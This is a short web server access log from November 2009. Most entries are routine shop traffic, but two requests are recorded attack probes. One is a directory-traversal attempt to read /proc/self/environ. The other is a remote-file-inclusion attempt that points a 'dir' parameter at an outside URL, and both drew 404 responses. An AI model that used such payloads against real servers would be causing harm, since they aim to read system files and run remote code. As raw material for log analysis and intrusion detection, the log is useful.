200.234.200.177 - - [26/Nov/2009:03:54:40 -0500] "GET /logs/error_log.Q109110100/lostpasswd.php?env[include_prefix]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
122.199.140.158 - - [26/Nov/2009:03:54:45 -0500] "GET /logs/access_log.Q109092500//bbs//skin/ggambo7002_board/write.php?dir=http://schulen.eduhi.at/hsstmartin.m/help/1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.169.189.169 - - [26/Nov/2009:03:54:41 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG HTTP/1.1" 200 63799 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE508BD13000786C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:45 -0500] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
121.169.189.169 - - [26/Nov/2009:03:54:46 -0500] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143CE538BE12000756C08E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
